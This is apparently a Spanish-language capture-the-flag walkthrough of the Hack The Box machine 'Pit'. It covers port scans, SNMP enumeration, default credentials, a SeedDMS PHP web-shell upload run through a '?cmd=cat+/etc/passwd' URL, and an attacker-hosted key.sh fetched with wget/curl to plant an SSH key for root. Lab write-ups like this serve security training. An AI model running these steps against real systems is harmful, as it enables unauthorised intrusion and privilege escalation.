echo "10.129.51.6 dms-pit.htb pit.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA pit 10.129.51.6 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210716125332.png Pasted image 20210716125351.png

nmap -sC -sV -O -p- -oA pit 10.129.51.6

nmap -sU -O -p- -oA pit-udp 10.129.51.6

nikto -h 10.129.51.6:80

gobuster dir -k -u http://10.129.51.6/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100


nmap -p- --open -T5 -v -n 172.31.1.8

nmap -p- --open -T5 -v -n 172.31.1.8 --max-retries 0 -oG allPorts

extractPorts allPorts

nmap -sCV -p21,53,80,135,389 172.31.1.8 -oN targeted --version-intensity 0


https://10.129.51.6

Pasted image 20210716124837.png

Vemos el dominio de pit.htb y lo metemos en etc/hosts

Pasted image 20210716125102.png

Hacemos un git clone de este repositorio

https://github.com/dheiland-r7/snmp

Pasted image 20210716130915.png

./snmpbw.pl 10.129.51.6 public 2 1

Pasted image 20210716130934.png

nmap -sVU -p 10.129.51.6 -oN snmScan

Pasted image 20210716131408.png

Pasted image 20210716131649.png

cat 10.129.51.6 | grep -i "var/www/html"

Pasted image 20210716131801.png

michelle:michelle Nos vamos a http://dms.pit.htb y metemos las credenciales

Pasted image 20210716132201.png

https://www.exploit-db.com/exploits/47022

Vemos un formulario para subir archivos.

Pasted image 20210716132524.png

Subimos un archivo con backdoor por ejemplo simple-backdoor.php

Pasted image 20210716132807.png

Vemos el document id para tener una referencia.

Pasted image 20210716132937.png

Vamos a http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat+/etc/passwd

Pasted image 20210716135038.png

Pasted image 20210716135952.png

Podemos ver las credenciales de una base de datos

Pasted image 20210716140206.png

Nos regresamos a ver en Cuentas los privilegios que tenemos como el usuario michelle

Pasted image 20210716140237.png

Vamos al terminal y vemos que podemos ver user.txt

Pasted image 20210716140311.png

Creamos una llave id_rsa

Pasted image 20210716140900.png

cat cu3rv0x.pub > key.sh

python3 -m http.server 8888

Pasted image 20210716142248.png

cd /usr/local/monitoring

wget http://10.10.14.94:8888/key.sh

curl http://10.10.14.94:8888/key.sh -o key.sh

Pasted image 20210716142311.png

snmpwalk -m +MY-MIB -v2c -c 10.129.51.6 nsExtendObjects

Pasted image 20210716143104.png

ssh -i cu3rv0x root@pit.htb

Pasted image 20210716143732.png

boxes

copyright©2022 Cu3rv0x all rights reserved